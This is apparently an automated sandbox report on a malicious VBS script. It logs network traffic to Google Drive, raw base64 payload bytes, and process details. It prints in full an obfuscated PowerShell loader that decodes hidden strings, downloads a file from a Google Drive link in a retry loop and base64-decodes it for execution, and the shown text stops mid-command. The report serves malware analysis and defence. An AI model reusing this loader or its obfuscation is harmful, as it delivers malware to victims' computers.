            Jul 3, 2024 08:54:44.455446959 CEST192.168.2.81.1.1.10x46c9Standard query (0)drive.google.comA (IP address)IN (0x0001)false
            Jul 3, 2024 08:54:45.519728899 CEST192.168.2.81.1.1.10x6886Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

            DNS Answers

            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
            Jul 3, 2024 08:52:48.815088034 CEST1.1.1.1192.168.2.80x7658No error (0)windowsupdatebg.s.llnwi.net87.248.204.0A (IP address)IN (0x0001)false
            Jul 3, 2024 08:54:44.462570906 CEST1.1.1.1192.168.2.80x46c9No error (0)drive.google.com142.250.186.78A (IP address)IN (0x0001)false
            Jul 3, 2024 08:54:45.528116941 CEST1.1.1.1192.168.2.80x6886No error (0)drive.usercontent.google.com142.250.186.161A (IP address)IN (0x0001)false

            HTTP Request Dependency Graph

            • drive.google.com
            • drive.usercontent.google.com

            HTTPS Proxied Packets

            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.856535142.250.186.784431296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            TimestampBytes transferredDirectionData
            2024-07-03 06:54:45 UTC215OUTGET /uc?export=download&id=1XwIRrEgtX8eQUieZQ-Qr9kkH3Qy6aisx HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
            Host: drive.google.com
            Connection: Keep-Alive
            2024-07-03 06:54:45 UTC1598INHTTP/1.1 303 See Other
            Content-Type: application/binary
            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
            Pragma: no-cache
            Expires: Mon, 01 Jan 1990 00:00:00 GMT
            Date: Wed, 03 Jul 2024 06:54:45 GMT
            Location: https://drive.usercontent.google.com/download?id=1XwIRrEgtX8eQUieZQ-Qr9kkH3Qy6aisx&export=download
            Strict-Transport-Security: max-age=31536000
            Cross-Origin-Opener-Policy: same-origin
            Content-Security-Policy: script-src 'nonce-17Z0VtJSKKj0GbP6SGO4Cg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
            Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
            Server: ESF
            Content-Length: 0
            X-XSS-Protection: 0
            X-Frame-Options: SAMEORIGIN
            X-Content-Type-Options: nosniff
            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
            Connection: close


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            1192.168.2.856536142.250.186.1614431296C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            TimestampBytes transferredDirectionData
            2024-07-03 06:54:46 UTC233OUTGET /download?id=1XwIRrEgtX8eQUieZQ-Qr9kkH3Qy6aisx&export=download HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
            Host: drive.usercontent.google.com
            Connection: Keep-Alive
            2024-07-03 06:54:47 UTC4828INHTTP/1.1 200 OK
            Content-Type: application/octet-stream
            Content-Security-Policy: sandbox
            Content-Security-Policy: default-src 'none'
            Content-Security-Policy: frame-ancestors 'none'
            X-Content-Security-Policy: sandbox
            Cross-Origin-Opener-Policy: same-origin
            Cross-Origin-Embedder-Policy: require-corp
            Cross-Origin-Resource-Policy: same-site
            X-Content-Type-Options: nosniff
            Content-Disposition: attachment; filename="Eluviates.deploy"
            Access-Control-Allow-Origin: *
            Access-Control-Allow-Credentials: false
            Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
            Access-Control-Allow-Methods: GET,HEAD,OPTIONS
            Accept-Ranges: bytes
            Content-Length: 478064
            Last-Modified: Tue, 02 Jul 2024 08:49:09 GMT
            X-GUploader-UploadID: ACJd0Np1VxZcuVKT_qJhXrp3BDVpD3lksEquAZXFJg8DTrGd5YVCDN45rHBgwz5-QxTBOc5AI28-PwmHyA
            Date: Wed, 03 Jul 2024 06:54:46 GMT
            Expires: Wed, 03 Jul 2024 06:54:46 GMT
            Cache-Control: private, max-age=0
            X-Goog-Hash: crc32c=cUFqng==
            Server: UploadServer
            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
            Connection: close
            2024-07-03 06:54:47 UTC4828INData Raw: 36 77 4c 46 45 58 45 42 6d 37 75 4e 56 78 77 41 63 51 47 62 36 77 49 34 64 41 4e 63 4a 41 54 72 41 76 69 64 36 77 4b 44 43 72 6d 2b 58 4d 6b 6f 36 77 4c 51 69 2b 73 43 52 2b 61 42 38 52 67 43 6a 38 4e 78 41 5a 76 72 41 70 6e 4d 67 66 47 6d 58 6b 62 72 36 77 4a 34 30 6e 45 42 6d 2b 73 43 51 75 31 78 41 5a 75 36 61 48 52 4b 6a 4f 73 43 30 6a 6e 72 41 6a 4c 57 63 51 47 62 36 77 4b 45 71 6a 48 4b 36 77 49 65 67 75 73 43 57 57 69 4a 46 41 76 72 41 69 48 36 36 77 4a 6e 77 39 48 69 63 51 47 62 63 51 47 62 67 38 45 45 36 77 4b 57 6c 65 73 43 2f 33 61 42 2b 54 4d 62 72 67 56 38 79 65 73 43 73 58 7a 72 41 69 6c 30 69 30 51 6b 42 48 45 42 6d 33 45 42 6d 34 6e 44 36 77 49 73 4f 4f 73 43 2f 73 61 42 77 2b 35 67 43 77 4e 78 41 5a 74 78 41 5a 75 36 44 58 51 45 68 65 73
            Data Ascii: 6wLFEXEBm7uNVxwAcQGb6wI4dANcJATrAvid6wKDCrm+XMko6wLQi+sCR+aB8RgCj8NxAZvrApnMgfGmXkbr6wJ40nEBm+sCQu1xAZu6aHRKjOsC0jnrAjLWcQGb6wKEqjHK6wIegusCWWiJFAvrAiH66wJnw9HicQGbcQGbg8EE6wKWlesC/3aB+TMbrgV8yesCsXzrAil0i0QkBHEBm3EBm4nD6wIsOOsC/saBw+5gCwNxAZtxAZu6DXQEhes
            2024-07-03 06:54:47 UTC4828INData Raw: 50 4e 55 4c 48 39 79 70 4a 4c 6f 51 43 6e 68 5a 57 6d 47 63 48 38 52 4b 47 36 35 50 41 70 6a 47 32 65 43 49 72 65 47 4a 75 57 75 33 32 39 66 46 75 44 4f 6b 4e 62 2b 6c 52 37 51 52 52 32 6c 69 41 47 48 59 74 6d 5a 48 4d 67 33 30 59 5a 49 6e 53 6c 56 41 46 65 49 35 4a 41 5a 59 65 79 68 4a 64 4f 4d 63 41 54 73 61 35 34 7a 46 45 55 45 66 4c 36 39 6d 4f 53 2f 4f 44 71 6f 50 4a 2b 30 6d 52 41 71 6a 75 6d 35 38 71 4f 4a 39 4e 62 6b 30 32 6d 67 4f 61 49 78 4d 67 7a 47 71 5a 53 39 55 33 37 59 4f 61 44 74 74 68 35 47 69 74 52 34 32 69 52 67 4d 4f 6f 51 79 43 2b 45 33 53 52 52 47 65 68 37 50 69 4e 45 71 2b 32 58 68 31 36 63 2f 61 63 4f 38 2b 6a 77 56 53 38 39 61 76 6e 34 49 71 49 62 4c 69 58 58 6a 53 66 78 35 4d 64 6b 67 62 4b 5a 4c 76 4b 70 39 41 6e 45 54 4a 77 35
            Data Ascii: PNULH9ypJLoQCnhZWmGcH8RKG65PApjG2eCIreGJuWu329fFuDOkNb+lR7QRR2liAGHYtmZHMg30YZInSlVAFeI5JAZYeyhJdOMcATsa54zFEUEfL69mOS/ODqoPJ+0mRAqjum58qOJ9Nbk02mgOaIxMgzGqZS9U37YOaDtth5GitR42iRgMOoQyC+E3SRRGeh7PiNEq+2Xh16c/acO8+jwVS89avn4IqIbLiXXjSfx5MdkgbKZLvKp9AnETJw5
            2024-07-03 06:54:47 UTC213INData Raw: 69 34 2b 65 59 77 37 4d 44 6c 70 51 49 50 42 72 61 74 54 66 53 68 38 71 59 5a 37 4c 6a 70 34 72 52 7a 71 55 45 4d 4c 38 58 70 79 38 68 4c 7a 4f 79 49 67 45 75 64 33 30 2b 71 53 57 6d 65 58 65 47 2b 79 34 5a 55 72 48 39 4b 50 6f 31 65 5a 47 35 64 73 6c 6c 5a 58 68 6a 66 31 6a 30 33 59 76 69 30 4e 76 33 75 4d 55 4d 50 77 57 38 63 55 53 4a 72 31 58 77 74 6c 4c 49 7a 31 39 76 6a 6b 44 65 6e 6d 73 61 4f 32 6d 30 6b 41 6c 61 69 31 50 61 71 49 6e 44 58 45 45 32 53 2f 5a 4e 57 71 74 47 50 6f 66 77 59 35 4f 6a 45 51 4b 66 54 75 46 47 4d 67 66 77 63 48 6c 6a 57 72 62 45 78 66 4c 69 70 38 44 54 62 4a 57 36 69 78 64 6a 62 38 68 35 52 4a 75 4d
            Data Ascii: i4+eYw7MDlpQIPBratTfSh8qYZ7Ljp4rRzqUEML8Xpy8hLzOyIgEud30+qSWmeXeG+y4ZUrH9KPo1eZG5dsllZXhjf1j03Yvi0Nv3uMUMPwW8cUSJr1XwtlLIz19vjkDenmsaO2m0kAlai1PaqInDXEE2S/ZNWqtGPofwY5OjEQKfTuFGMgfwcHljWrbExfLip8DTbJW6ixdjb8h5RJuM
            2024-07-03 06:54:47 UTC1324INData Raw: 7a 42 4e 57 61 47 69 5a 4f 2f 6f 4d 69 4a 58 30 77 50 4a 4e 53 51 45 64 33 52 70 37 64 4d 2f 74 31 39 77 37 39 47 7a 65 73 59 54 5a 4e 55 58 72 75 65 4f 6e 69 74 48 6a 64 6a 50 50 72 64 2b 34 7a 71 58 70 56 5a 6f 6c 38 49 70 35 74 79 31 51 4d 69 62 6d 69 58 65 59 66 71 75 74 73 74 44 7a 77 49 36 72 43 6d 4c 6a 79 44 47 57 4f 73 73 35 79 6e 58 4e 58 33 5a 75 45 75 6e 73 45 54 46 6a 56 47 59 42 30 33 44 45 41 64 53 66 67 73 66 65 30 2b 56 2f 30 50 48 36 44 44 66 6b 47 50 2b 69 67 44 6c 76 36 70 39 49 64 2f 7a 6f 39 34 6e 36 72 4c 59 4b 61 70 36 56 64 59 6d 36 51 35 66 42 72 55 70 74 4b 4b 79 55 58 4c 2f 61 35 5a 4c 77 4f 41 63 73 6b 50 47 30 46 5a 6b 41 41 52 36 6a 45 4e 68 36 2f 74 54 52 68 6d 37 7a 58 68 57 52 48 72 57 48 39 30 42 47 62 75 56 43 6e 6c 58
            Data Ascii: zBNWaGiZO/oMiJX0wPJNSQEd3Rp7dM/t19w79GzesYTZNUXrueOnitHjdjPPrd+4zqXpVZol8Ip5ty1QMibmiXeYfqutstDzwI6rCmLjyDGWOss5ynXNX3ZuEunsETFjVGYB03DEAdSfgsfe0+V/0PH6DDfkGP+igDlv6p9Id/zo94n6rLYKap6VdYm6Q5fBrUptKKyUXL/a5ZLwOAcskPG0FZkAAR6jENh6/tTRhm7zXhWRHrWH90BGbuVCnlX
            2024-07-03 06:54:47 UTC1390INData Raw: 2f 59 31 76 79 61 6f 63 6f 4f 71 72 75 53 53 42 44 5a 58 44 51 70 4f 41 4f 61 4d 50 78 2f 61 6b 79 69 6a 79 77 70 2b 71 77 74 6e 75 63 38 6b 69 35 39 33 4b 34 75 50 6e 69 75 4c 6a 35 34 72 69 34 2b 65 4b 34 75 50 6e 69 75 4c 6a 35 34 72 69 34 2b 65 4b 39 37 73 75 30 4c 64 43 31 68 62 42 36 6a 70 4c 50 36 69 2b 6d 47 78 35 65 38 54 41 41 4c 47 4b 59 75 50 7a 5a 42 6f 5a 39 74 72 43 6b 77 54 78 4a 49 33 48 2b 69 6f 4a 48 33 46 43 6e 79 48 46 76 77 6b 48 2b 6a 39 7a 56 57 59 32 68 4d 58 79 6f 4b 57 41 36 39 43 2b 4c 2f 67 38 53 31 4e 31 67 44 2f 65 4f 44 4f 49 44 4f 5a 44 43 36 56 59 34 75 55 7a 64 37 49 47 55 2b 30 55 66 48 4b 32 34 30 70 5a 4e 77 32 59 4c 43 2f 72 70 52 52 56 6f 76 2f 42 66 42 46 43 31 64 79 44 32 50 46 65 34 53 4f 72 6e 71 4c 6a 35 34 72
            Data Ascii: /Y1vyaocoOqruSSBDZXDQpOAOaMPx/akyijywp+qwtnuc8ki593K4uPniuLj54ri4+eK4uPniuLj54ri4+eK97su0LdC1hbB6jpLP6i+mGx5e8TAALGKYuPzZBoZ9trCkwTxJI3H+ioJH3FCnyHFvwkH+j9zVWY2hMXyoKWA69C+L/g8S1N1gD/eODOIDOZDC6VY4uUzd7IGU+0UfHK240pZNw2YLC/rpRRVov/BfBFC1dyD2PFe4SOrnqLj54r
            2024-07-03 06:54:47 UTC1390INData Raw: 71 53 62 35 75 73 61 30 4f 62 47 51 62 76 4d 2b 71 65 51 58 72 5a 57 30 4f 58 47 31 41 49 76 61 69 69 52 35 42 59 78 63 2f 41 63 56 47 53 4c 52 5a 6f 37 51 41 49 6b 51 70 58 46 6c 56 76 4d 6d 52 69 7a 68 56 47 73 30 76 44 49 75 62 31 56 4b 52 43 77 38 39 75 6b 41 73 44 35 53 34 2b 4e 33 48 32 4d 57 36 4d 55 64 32 38 35 64 34 2f 4c 44 56 66 67 39 35 66 41 42 4d 56 7a 34 44 4c 67 33 70 64 77 52 4b 5a 53 56 67 69 79 36 74 70 6f 54 34 4c 67 51 44 41 34 71 50 6e 6e 30 31 52 44 59 34 50 51 35 6f 37 57 54 4d 2f 36 70 39 50 67 78 79 45 41 35 77 70 36 61 69 71 4b 70 39 65 35 2f 33 6e 67 61 41 4d 4e 62 71 75 34 66 30 50 70 38 57 59 78 47 34 34 4a 37 53 55 4b 41 35 57 33 48 4c 64 48 45 6a 54 6a 31 7a 31 64 6a 75 38 31 32 43 67 46 30 73 74 53 75 34 64 73 32 38 34 78
            Data Ascii: qSb5usa0ObGQbvM+qeQXrZW0OXG1AIvaiiR5BYxc/AcVGSLRZo7QAIkQpXFlVvMmRizhVGs0vDIub1VKRCw89ukAsD5S4+N3H2MW6MUd285d4/LDVfg95fABMVz4DLg3pdwRKZSVgiy6tpoT4LgQDA4qPnn01RDY4PQ5o7WTM/6p9PgxyEA5wp6aiqKp9e5/3ngaAMNbqu4f0Pp8WYxG44J7SUKA5W3HLdHEjTj1z1dju812CgF0stSu4ds284x
            2024-07-03 06:54:47 UTC1390INData Raw: 69 4b 63 45 4b 49 78 45 6a 38 2b 73 78 76 74 57 43 45 75 35 4e 76 44 6d 61 59 77 73 61 4a 58 42 6f 36 6c 49 57 55 79 73 70 47 31 53 71 38 71 30 68 72 4b 6b 72 32 74 68 47 58 42 4c 59 70 59 59 73 76 6d 51 64 6a 49 68 7a 69 50 71 2b 4f 36 4a 68 30 54 65 37 37 56 65 67 2b 65 77 4b 36 6a 41 35 6c 7a 6a 76 36 69 54 4d 70 44 4c 66 7a 6c 43 44 77 57 57 35 71 30 57 37 79 63 36 69 79 66 73 38 7a 52 61 72 45 55 67 42 7a 6e 56 2b 68 72 4d 73 70 78 6d 42 48 4f 46 6c 30 46 46 37 44 7a 37 33 61 70 75 75 59 75 32 43 32 36 4a 57 73 65 62 4d 69 56 46 71 44 75 6f 77 70 35 52 4b 39 71 71 42 2f 64 7a 43 55 50 68 4e 77 54 46 38 79 43 75 41 4f 76 55 76 61 61 6d 73 51 34 77 2b 57 45 4f 49 49 63 4b 30 63 37 6b 68 32 75 75 56 75 65 34 31 79 42 57 4d 46 4c 48 46 39 5a 7a 72 68 71
            Data Ascii: iKcEKIxEj8+sxvtWCEu5NvDmaYwsaJXBo6lIWUyspG1Sq8q0hrKkr2thGXBLYpYYsvmQdjIhziPq+O6Jh0Te77Veg+ewK6jA5lzjv6iTMpDLfzlCDwWW5q0W7yc6iyfs8zRarEUgBznV+hrMspxmBHOFl0FF7Dz73apuuYu2C26JWsebMiVFqDuowp5RK9qqB/dzCUPhNwTF8yCuAOvUvaamsQ4w+WEOIIcK0c7kh2uuVue41yBWMFLHF9Zzrhq
            2024-07-03 06:54:47 UTC1390INData Raw: 38 68 45 30 53 55 75 4f 34 54 48 34 64 32 33 2f 6c 4c 73 57 69 46 68 2b 66 4b 34 74 44 2b 69 70 77 72 47 4e 43 61 64 54 2f 44 6f 55 53 32 6c 77 45 42 7a 68 4d 52 32 59 35 44 4a 46 77 6a 46 71 78 4e 65 53 51 74 61 78 41 63 64 6b 31 6d 41 31 71 75 42 2f 5a 58 4b 38 79 56 41 70 6c 35 36 6a 53 30 42 2f 42 30 77 31 74 77 39 30 54 46 38 32 43 6d 51 4f 75 58 50 79 63 78 35 66 50 79 68 4e 6a 4c 4b 72 76 52 2b 56 65 6b 5a 77 79 50 4d 33 6f 56 30 6d 65 4c 69 78 6f 39 69 47 77 32 31 33 2f 75 78 37 52 68 39 47 6d 34 64 47 41 6e 33 36 4c 6a 35 34 72 69 34 2b 65 4b 34 75 50 6e 69 75 4c 6a 35 34 72 69 34 2b 65 4b 34 75 50 6e 69 75 4c 6a 39 43 55 4e 63 4c 36 33 4e 56 64 32 36 36 68 43 57 75 71 53 42 37 4b 5a 31 49 4f 58 5a 39 58 70 6d 61 71 53 50 49 31 67 46 6a 63 7a 4a
            Data Ascii: 8hE0SUuO4TH4d23/lLsWiFh+fK4tD+ipwrGNCadT/DoUS2lwEBzhMR2Y5DJFwjFqxNeSQtaxAcdk1mA1quB/ZXK8yVApl56jS0B/B0w1tw90TF82CmQOuXPycx5fPyhNjLKrvR+VekZwyPM3oV0meLixo9iGw213/ux7Rh9Gm4dGAn36Lj54ri4+eK4uPniuLj54ri4+eK4uPniuLj9CUNcL63NVd266hCWuqSB7KZ1IOXZ9XpmaqSPI1gFjczJ
            2024-07-03 06:54:47 UTC1390INData Raw: 69 75 4c 6a 35 34 72 69 34 2b 65 4b 34 75 50 6e 6e 73 42 4e 65 41 45 53 59 67 36 54 6f 4a 43 78 38 69 34 66 69 7a 48 6c 6c 4c 35 41 4b 44 71 78 6e 30 31 71 47 31 6a 36 41 35 59 74 67 56 6b 63 36 70 6c 31 44 6f 65 6f 67 35 6f 38 64 69 38 38 4b 70 6c 44 5a 44 6d 77 67 61 41 6f 76 53 53 41 75 65 64 72 41 6e 4f 2b 6b 53 4c 4f 59 51 56 50 63 6c 70 36 52 69 55 50 65 41 57 76 34 58 62 30 65 30 6e 72 68 70 30 58 58 4d 7a 57 53 4f 4a 38 4e 50 56 42 67 76 41 69 6f 2b 65 65 7a 4f 4b 44 37 48 6a 75 6d 70 34 2f 67 43 72 51 44 7a 4c 32 78 34 52 2b 7a 57 4a 32 68 4d 58 79 6f 71 4f 41 30 32 79 64 65 55 4c 52 4c 4e 55 71 32 61 39 69 4a 6d 41 2f 42 48 76 65 7a 4d 2b 7a 74 6f 43 6e 5a 70 73 6e 66 32 74 4a 4b 61 4f 59 2f 4e 6b 65 39 6c 48 4a 45 76 58 50 51 61 44 4e 70 48 61
            Data Ascii: iuLj54ri4+eK4uPnnsBNeAESYg6ToJCx8i4fizHllL5AKDqxn01qG1j6A5YtgVkc6pl1Doeog5o8di88KplDZDmwgaAovSSAuedrAnO+kSLOYQVPclp6RiUPeAWv4Xb0e0nrhp0XXMzWSOJ8NPVBgvAio+eezOKD7Hjump4/gCrQDzL2x4R+zWJ2hMXyoqOA02ydeULRLNUq2a9iJmA/BHvezM+ztoCnZpsnf2tJKaOY/Nke9lHJEvXPQaDNpHa
            2024-07-03 06:54:47 UTC1390INData Raw: 4a 2f 68 32 4c 6a 35 34 72 69 34 2b 65 4b 34 75 50 6e 69 75 4c 6a 35 34 72 69 34 2b 65 4b 34 75 50 6e 69 75 4c 78 46 41 35 78 72 51 68 54 30 69 4e 48 59 70 59 77 79 54 55 64 41 32 30 77 36 78 31 59 64 51 41 77 37 6f 6a 41 49 37 65 6f 6f 70 6d 72 69 71 4c 6a 77 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
            Data Ascii: J/h2Lj54ri4+eK4uPniuLj54ri4+eK4uPniuLxFA5xrQhT0iNHYpYwyTUdA20w6x1YdQAw7ojAI7eoopmriqLjwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


            Statistics

            CPU Usage

            Click to jump to process

            Memory Usage

            Click to jump to process

            High Level Behavior Distribution

            Click to dive into process behavior distribution

            Behavior

            Click to jump to process

            System Behavior

            General

            Target ID:0
            Start time:02:52:48
            Start date:03/07/2024
            Path:C:\Windows\System32\wscript.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2669976595_366408723_KHI_SOF_240702_0957_P.vbs"
            Imagebase:0x7ff62af70000
            File size:170'496 bytes
            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:9
            Start time:02:54:38
            Start date:03/07/2024
            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility aflytningsudstyrene Sortkridtstegningerne myoparalysis Rivinian Undgldes Chowtime Anodynia Betoningerne Blyantstegninger Frydefuld Whacker Prvekrt Kendemrket Fjernsynets Oligocarpous Hawkshaws Underlegenhedsflelserne Sortspttes Boleroers Opklares Kamsin Archin intetanendes Exhaustibility';If (${host}.CurrentCulture) {$reinvigorate++;}Function Reeling($Takkende){$Mjavende=$Takkende.Length-$reinvigorate;$Neocortical='SUBsTRI';$Neocortical+='ng';For( $kngtende=2;$kngtende -lt $Mjavende;$kngtende+=3){$aflytningsudstyrene+=$Takkende.$Neocortical.Invoke( $kngtende, $reinvigorate);}$aflytningsudstyrene;}function Convictively($Mispainted){ . ($Aabningstid) ($Mispainted);}$lignings=Reeling ' ,MHwo,ozSciColP,lKiaOv/Sh5F..Ta0En F(SeW AiNonTcdCioB,wH,sTe FlN KTSk Fi1.y0Fo.C 0Ly;U. ,WStiSpn l6be4ei; , .kx u6 ,4,i;In LorInvun: a1Ac2Ag1F .Be0,i)Af ,oG aesicKakdeo S/Sk2Ir0Ny1Ol0Ou0Op1Fl0Sa1K, DeFReiRerYdeRafEso,axOp/ u1 S2 ,1Sk.Be0M, ';$Triatomicity=Reeling 'InUP s,ue SrCa-NoAOeg iefinVat a ';$Undgldes=Reeling ' Fh At,etCep ks P:In/Dr/Sed,lrt,iO.vSueCh. VgVao ,oPegBalCaee .LecFroS,m.a/M.u ecSe?B,e,hx npDioA,r.atLn=PodWaoR.wS,nGol GoS a.rd T&F,iSjdSt= P1anX SwObI.aR rDiEl,g ytAfX .8Ude ,QPuUTii.seMaZWhQSe- FQt.rLa9PrkStkMeHRe3PrQMuyAf6 ,a DiGos.gxSu ';$Alytes=Reeling ' G>P. ';$Aabningstid=Reeling ',riS.e axEs ';$Proboscidiferous='Betoningerne';$Friluftsmenneskerne = Reeling ' uenycI.h,ro . P%Una MpGop.nd.oa,rtOmaD.%Za\AgNSpoRenZic,hoS nHagA,eGesDrtA,im oB.nHa.A FRaoRer.e La&Ta&Se BaeIncA.hUnoPr sntNs ';Convictively (Reeling 'Di$TigFolTuoWab ea OlHa:,lF u Vs heSttTa=A ( ccSumTrdPs Ho/EncF. U$ rF .r .i ,lEuu uf VtStsSpmDee FnSunFaeArsRokOveGyrFan ,e .) ');Convictively (Reeling 'Re$.egB l ioB.bPlaPil S: R,oi mvEniN nIni .afanFo=sp$aiUCyn TdCag.pl RdReehysNo.sysCopIrl .iSyt .( $olAIml,hyGrt Ue es S) ');Convictively (Reeling 'D,[GlNK.eKatSu.OxS SeKerKov.oi.acO e FPHeoK i,onPet .MBaaBln ,a geleBir U]Bl:C.:SqSste.ecK.uBarN,iPit y BPNer eo FtF oZycPuo Tl.n R =Dr Ca[DiNTreKrtDy.U,SMeeRecSuuFrrU iint IyScPB rExo.st o PcLaoQulTrTAlyBopSte L] V:Tu:,fT MlM sB,1Y 2 u ');$Undgldes=$Rivinian[0];$Rengringsmidlets= (Reeling 'Pu$Q,gBal ,oLubP.aN,lPi:MeOM,pHagS.rVea.ivGueS.= ,N neRyw .-,lO Db Bj MeNocAptDe FSS.yPosUdtC,egom.d.HvN SeInt o.G.WSpe ObH CM,lAliWoe n At');$Rengringsmidlets+=$Fuset[1];Convictively ($Rengringsmidlets);Convictively (Reeling 'No$S,OB.pBagMor.aaF vBoe x.,eHskeTraKddTae .rA,s S[Be$GoT,arM,iBiaKnt Ko Sm RiTic.ri Ft yDe]L.=F.$ BlAfiPogArnF,i AnElgOvsfo ');$promachos=Reeling ' S$OsO ,p GgCorU,aGsvSkeK,.FrDIno ,wPrnB,lOfo RaKadGaF,ni lP eB.(B,$SaU.onirdGegfal bdSueBrs S, .$TeASqr ,cF,h,ni TnIn)Am ';$Archin=$Fuset[0];Convictively (Reeling ',a$Fog tlSuoAlbIna.alMa:G.R .e,erN aYakMaeGa= e(InT Se.lsVit C- aP.raCotGehCh Di$F,AUnr.ic ghUfi fn L)Di ');while (!$Rerake) {Convictively (Reeling 'Op$.vgHylReoF.b ha Al D:TuST tAuoSurDimb a Ds tC.=Ro$ FtG.rMaulyeDr ') ;Convictively $promachos;Convictively (Reeling ' USGatBraTar Pt B-AuSG.l eeCheUnp H ,r4Ez ');Convictively (Reeling ' U$A,g PlBloa,bPeaKllCe:FoRP.ePhrPraVakt,e ,=An(flTRoeC,sGytse-T.P,iaS teghRe Ut$S.A Hr ncsah EiH.nLi)Tu ') ;Convictively (Reeling ',i$SagSklfooslbPha VlEl: EmCiy koidpMua tr Da olI y,ns.oiBusK,=.v$LegUmlVkoLibMaaH l F: .S foOur yt.rkF.r GiV.di.tI sSat eElgFrnL,iConOsgSoeKarSun,teBr+An+F %Bi$PeR,piPrvSciRenAtiQuaU nMi. CcSeoHauConE,tHv ') ;$Undgldes=$Rivinian[$myoparalysis];}$Forblndede=332547;$Antisiphon=26001;Convictively (Reeling ' u$ lgLel,eoBebUnaTal :MaBP,lU.yT,a SnAmt Ws tEne EgG n oi EnBrg.seOvrVi I=N gGSke t .-SpC boUdn.ut Ce Dn .t na$ AAF,rEfc Th Si.nnEt ');Convictively (Reeling ' T$G,gB lFeoReb GaTrl P:HeSFukheiSem,omE.ePht S St=Oc Ve[TrS Sy.us StR,eBemPr.L,CAdo ,n .vIne ,rCatBa].o: b: FG.r ,o,amDiBCha Ds ,eTr6s.4H S,et rP,iM n Ag B( .$saBSalMoyB,aF,n,atU.sArt ,e xgSpn,liRlntrgInestrBe)Z. ');Convictively (Reeling 'Ta$H,g .lShoNub AaK.lCe:ChPJorRev MeFlkSprDetLi S =my T.[ USR.yU,sEntTreBomT .OtTPre Mx,ft ,.ThE nApcVao AdTaiHanDjgM ]Gr:Pa:BaA S.oC I,xISt.s GMyeFot,tSI tRir Cio nF.gRa( T$ MS,bkNaiLem imVaeFotI,)Ta ');Convictively (Reeling 'Co$Bug ,lMoo bReaFal R:.yB.ne prK.cMae Eaa uSa=Ko$DePf.rT vsoe 